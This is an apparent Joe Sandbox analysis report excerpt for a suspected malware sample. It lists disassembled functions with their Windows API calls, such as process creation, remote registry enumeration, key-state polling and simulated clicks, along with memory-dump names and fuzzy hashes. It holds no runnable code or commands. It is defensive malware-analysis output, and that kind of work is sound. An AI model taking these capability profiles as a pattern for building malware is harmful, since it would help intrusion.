GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0067DB5E
__swprintf.LIBCMT ref: 0067DB77
SetErrorMode.KERNEL32(00000000,00000001,00000000,006CDC00), ref: 0067DBB5

Strings

%lu, xrefs: 0067DB71

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 0471ba6fad533f2576033e3115a3496f46e10cf821b9fc6db8ee63da748a2a2d
Instruction ID: 90e3264aa925771dbbf43520df8093c36aa30e069454cc6c8e9544003b426f96
Opcode Fuzzy Hash: 0471ba6fad533f2576033e3115a3496f46e10cf821b9fc6db8ee63da748a2a2d
Instruction Fuzzy Hash: DF218375600108AFCB50EF64CD85EAEB7BAEF49714F10406DF509EB251DB70EA41CB64

Function 0066C9E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0066C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0066C84A
Part of subcall function 0066C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0066C85D
Part of subcall function 0066C82D: GetCurrentThreadId.KERNEL32 ref: 0066C864
Part of subcall function 0066C82D: AttachThreadInput.USER32(00000000), ref: 0066C86B

GetFocus.USER32 ref: 0066CA05

Part of subcall function 0066C876: GetParent.USER32(?), ref: 0066C884

GetClassNameW.USER32(?,?,00000100), ref: 0066CA4E
EnumChildWindows.USER32(?,0066CAC4), ref: 0066CA76
__swprintf.LIBCMT ref: 0066CA90

Strings

%s%d, xrefs: 0066CA8A

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
String ID: %s%d
API String ID: 3187004680-1110647743
Opcode ID: 5a701e197987867a621f906514593f8b7e0a4d9ef38d4255c154d3708a8b3661
Instruction ID: 81d9a8689e9f3188298719bdcdbf2bbefd3848edada80fc7b6535eb95bbff044
Opcode Fuzzy Hash: 5a701e197987867a621f906514593f8b7e0a4d9ef38d4255c154d3708a8b3661
Instruction Fuzzy Hash: B51184B16002097BCB51BFA4CC95FF93B6EAF44714F00806EFE48AA182DB749545DBB4

Function 00657A94 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 00657AD8

Part of subcall function 00657CF4: __mtinitlocknum.LIBCMT ref: 00657D06
Part of subcall function 00657CF4: EnterCriticalSection.KERNEL32(00000000,?,00657ADD,0000000D), ref: 00657D1F

InterlockedIncrement.KERNEL32(?), ref: 00657AE5
__lock.LIBCMT ref: 00657AF9
___addlocaleref.LIBCMT ref: 00657B17

Strings

`k, xrefs: 00657AA3

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
String ID: `k
API String ID: 1687444384-2483355702
Opcode ID: edda9b993abee5322f209561442569d443a8c0e4b222b2d00a63e103419844c6
Instruction ID: 02d78ad3ba93d03921bf8068782d8136ee9cc94c593db2f24262bb3545ff2250
Opcode Fuzzy Hash: edda9b993abee5322f209561442569d443a8c0e4b222b2d00a63e103419844c6
Instruction Fuzzy Hash: 50018071405B00DFD760DF75D90674ABBF2EF50322F20894EE89A972A0CBB0A688CB05

Function 0069E32E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0069E33D
_memset.LIBCMT ref: 0069E34C
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,006F3D00,006F3D44), ref: 0069E37B
CloseHandle.KERNEL32 ref: 0069E38D

Strings

D=o, xrefs: 0069E346

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID: D=o
API String ID: 3277943733-1060620409
Opcode ID: abd05aec50157f8fbbbf33a3a75f132d899f48ce8ab860701f3b743f41999ac5
Instruction ID: e6e5ec00a4732f3b37229330190609cb3b2dd6ae128029cdd0cd94883d651e6d
Opcode Fuzzy Hash: abd05aec50157f8fbbbf33a3a75f132d899f48ce8ab860701f3b743f41999ac5
Instruction Fuzzy Hash: 2CF05EF5540324BAF3105B60EC46F777E6EEF04754F005521BF08DA2A2D7759E0086A8

Function 00691945 Relevance: 7.7, APIs: 5, Instructions: 232COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 006919F3
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00691A26
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00691B49
CloseHandle.KERNEL32(?), ref: 00691BBF

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: c2ea82e5640035e07974cd8fb302b60f9b4f224904ca5e3942c7729c963f77a7
Instruction ID: aca5861aba8efed5cd8bd6ac6f875dac7c809d0d603cf0c48a262b4f01dd04ee
Opcode Fuzzy Hash: c2ea82e5640035e07974cd8fb302b60f9b4f224904ca5e3942c7729c963f77a7
Instruction Fuzzy Hash: 8E8173B0A00205ABDF50DF64C896BADBBEAFF05720F14845DF905AF382D7B5A941CB94

Function 0069E062 Relevance: 7.7, APIs: 5, Instructions: 187windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0069E1D5
SendMessageW.USER32(?,000000B0,?,?), ref: 0069E20D
IsDlgButtonChecked.USER32(?,00000001), ref: 0069E248
GetWindowLongW.USER32(?,000000EC), ref: 0069E269
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0069E281

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: MessageSend$ButtonCheckedLongWindow
String ID:
API String ID: 3188977179-0
Opcode ID: c2e10ef6b8f333a78902f5d094f0feb68076c89b95ec30f9c8f4f1aeae022505
Instruction ID: ec5c7afa1258166cd20bbc7d5ffe18f93d6a21418970b4580b0c2e1abde91902
Opcode Fuzzy Hash: c2e10ef6b8f333a78902f5d094f0feb68076c89b95ec30f9c8f4f1aeae022505
Instruction Fuzzy Hash: 93618D74A00204AFDF20CF58C894FFA7BBFAF8A310F144059E9599B7A1C772A951CB10

Function 00671C9A Relevance: 7.7, APIs: 5, Instructions: 158COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00671CB4
VariantClear.OLEAUT32(00000013), ref: 00671D26
VariantClear.OLEAUT32(00000000), ref: 00671D81
VariantClear.OLEAUT32(?), ref: 00671DF8
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00671E26

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: f96345d1c80910fb7d6b418e6429d68f8df4ae2b42e945204aec3c92a3d5b218
Instruction ID: d5f0d60594602cfba6af0328d3eec1dadae8b5d85825aed9d79cdbc43043ee47
Opcode Fuzzy Hash: f96345d1c80910fb7d6b418e6429d68f8df4ae2b42e945204aec3c92a3d5b218
Instruction Fuzzy Hash: 205149B5A00209AFDB14CF58C884AAAB7B9FF4D314B15855AE959DB300E730E951CFA0

Function 00690688 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0063936C: __swprintf.LIBCMT ref: 006393AB
Part of subcall function 0063936C: __itow.LIBCMT ref: 006393DF

LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 006906EE
GetProcAddress.KERNEL32(00000000,?), ref: 0069077D
GetProcAddress.KERNEL32(00000000,00000000), ref: 0069079B
GetProcAddress.KERNEL32(00000000,?), ref: 006907E1
FreeLibrary.KERNEL32(00000000,00000004), ref: 006907FB

Part of subcall function 0064E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0067A574,?,?,00000000,00000008), ref: 0064E675
Part of subcall function 0064E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0067A574,?,?,00000000,00000008), ref: 0064E699

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: 5eabf4951de8740139bb3962f37c50d72d3817923f84a93fda1f486f16429b92
Instruction ID: 04eecd7bb5fcd70439f2e394acae23d04f0f3b3c4cd2a3fa2272b00b97b35624
Opcode Fuzzy Hash: 5eabf4951de8740139bb3962f37c50d72d3817923f84a93fda1f486f16429b92
Instruction Fuzzy Hash: A2512A75A00205DFDF40EFA8D8819ADB7BABF49320F148059EA15AB352DB30ED46CF94

Function 00692E29 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00693C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00692BB5,?,?), ref: 00693C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00692EEF
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00692F2E
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00692F75
RegCloseKey.ADVAPI32(?,?), ref: 00692FA1
RegCloseKey.ADVAPI32(00000000), ref: 00692FAE

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 3740051246-0
Opcode ID: 9d558bff3c53d2ccf1432a389575de74db22c79e610ed9b495c78fec36f8fda7
Instruction ID: 97cf006792fe1bc66b23c9c85045834f1bd4462987beaf28665f94282012b77e
Opcode Fuzzy Hash: 9d558bff3c53d2ccf1432a389575de74db22c79e610ed9b495c78fec36f8fda7
Instruction Fuzzy Hash: 5F514C71208205AFDB44EF54C891EABB7FAFF88314F04891DF59697291DB30E905CB96

Function 0069CCF7 Relevance: 7.6, APIs: 5, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60102a1cce08f294debd0b37381593ab6cd849e20364f71c6d97100d144c98de
Instruction ID: 3f5956aa06b530a0ed5bb556ee15a74ad41bbf8d6fc6b52962cf38b4d58bcca0
Opcode Fuzzy Hash: 60102a1cce08f294debd0b37381593ab6cd849e20364f71c6d97100d144c98de
Instruction Fuzzy Hash: C641A379900104AFDF10DB68CC44FE9BB6EEF09370F150265E95AAB6E1D730AD45DA50

Function 00681206 Relevance: 7.6, APIs: 5, Instructions: 127COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 006812B4
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 006812DD
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0068131C

Part of subcall function 0063936C: __swprintf.LIBCMT ref: 006393AB
Part of subcall function 0063936C: __itow.LIBCMT ref: 006393DF

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00681341
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00681349

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: b3f4bb8a21d311bf5c40ec61caac1a0f7ecda5ff1618f1cf12e3eb5033793e19
Instruction ID: daa8871cedc0f525d9921bb0452def8adeedde0d9c5082bed44bc58e6abe4cb4
Opcode Fuzzy Hash: b3f4bb8a21d311bf5c40ec61caac1a0f7ecda5ff1618f1cf12e3eb5033793e19
Instruction Fuzzy Hash: CA412B75A00105DFDB41EF64C9819AEBBF6FF09310B148099E90AAB361DB31EE41CFA4

Function 0064B63C Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(000000FF), ref: 0064B64F
ScreenToClient.USER32(00000000,000000FF), ref: 0064B66C
GetAsyncKeyState.USER32(00000001), ref: 0064B691
GetAsyncKeyState.USER32(00000002), ref: 0064B69F

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 38977404ae875d4779173c4008f7f6f55a84566b77ff2452f40479ed939f4106
Instruction ID: 0f9a2afb9ee53118f6d8d32ff77cd47ac4e5e4752e535a0483259a7bea01dd0a
Opcode Fuzzy Hash: 38977404ae875d4779173c4008f7f6f55a84566b77ff2452f40479ed939f4106
Instruction Fuzzy Hash: BA415F75508119FFDF159F64C844AE9BB76FB06324F104319F82A96290CB30AD94DFA1

Function 0066B358 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0066B369
PostMessageW.USER32(?,00000201,00000001), ref: 0066B413
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0066B41B
PostMessageW.USER32(?,00000202,00000000), ref: 0066B429
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0066B431

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: c18bbf08f6c8f0f5c1522564c3ccc74b7534e6c06742af76dc4cc31dfd34e468
Instruction ID: 064fa5f5eddc8773eba2311398afd346f6dd1453e8058e7d99522c7a88f03e21
Opcode Fuzzy Hash: c18bbf08f6c8f0f5c1522564c3ccc74b7534e6c06742af76dc4cc31dfd34e468
Instruction Fuzzy Hash: FA31CEB1A00219EBDF04CF68D94DADE3BB6EB04315F105229F821EA2D1D7B09994CB90

Function 0066DBBF Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0066DBD7
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0066DBF4
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0066DC2C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0066DC52
_wcsstr.LIBCMT ref: 0066DC5C

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: 0f2ad9a57a768b5572080e093d072b36f494dc79a73232035701ec7aaa5172c3
Instruction ID: bfe1c77b544b4a0b4143d5804a066b8e2e157f687dc407de79a8324aae2bc8dd
Opcode Fuzzy Hash: 0f2ad9a57a768b5572080e093d072b36f494dc79a73232035701ec7aaa5172c3
Instruction Fuzzy Hash: 9021F972B04244BBEB159F399C49EBF7BAEDF45750F10413DF809CA191EAA1DC41D2A4

Function 0069DE69 Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 0064B34E: GetWindowLongW.USER32(?,000000EB), ref: 0064B35F

GetWindowLongW.USER32(?,000000F0), ref: 0069DEB0
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0069DED4
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0069DEEC
GetSystemMetrics.USER32(00000004), ref: 0069DF14
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,00683A1E,00000000), ref: 0069DF32

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 07b7f28f28aa43c2ac54c4244a13e258278d6d734161147954d0dc3dea2c9e37
Instruction ID: d726d931af603c95da4c44838549dedd6d8bb06d22deadb6cd2d4d12a707ea87
Opcode Fuzzy Hash: 07b7f28f28aa43c2ac54c4244a13e258278d6d734161147954d0dc3dea2c9e37
Instruction Fuzzy Hash: 9021B371615216AFCF204F79DC44BAA779AFB15374F150734F926DAAE0E7309851CB80

Function 0066BC77 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0066BC90
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0066BCC2
__itow.LIBCMT ref: 0066BCDA
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0066BD00
__itow.LIBCMT ref: 0066BD11

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: 159376f8ba91925fb50293331df62dc172b90a20c06a60778a2d2adca184145c
Instruction ID: ac7f0ca4328b0056dd9ccbd770121159bb5ab728dbd3cbc11a753dfe14ec1e16
Opcode Fuzzy Hash: 159376f8ba91925fb50293331df62dc172b90a20c06a60778a2d2adca184145c
Instruction Fuzzy Hash: 24219975600218BADB10AB658C46FDE7B6BAF5A750F002029F905EF181EB708D8587A5

Function 00676318 Relevance: 7.6, APIs: 5, Instructions: 80COMMON

Download Yara Rule

APIs

Part of subcall function 006350E6: _wcsncpy.LIBCMT ref: 006350FA

GetFileAttributesW.KERNEL32(?,?,?,?,006760C3), ref: 00676369
GetLastError.KERNEL32(?,?,?,006760C3), ref: 00676374
CreateDirectoryW.KERNEL32(?,00000000,?,?,?,006760C3), ref: 00676388
_wcsrchr.LIBCMT ref: 006763AA

Part of subcall function 00676318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,006760C3), ref: 006763E0

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
String ID:
API String ID: 3633006590-0
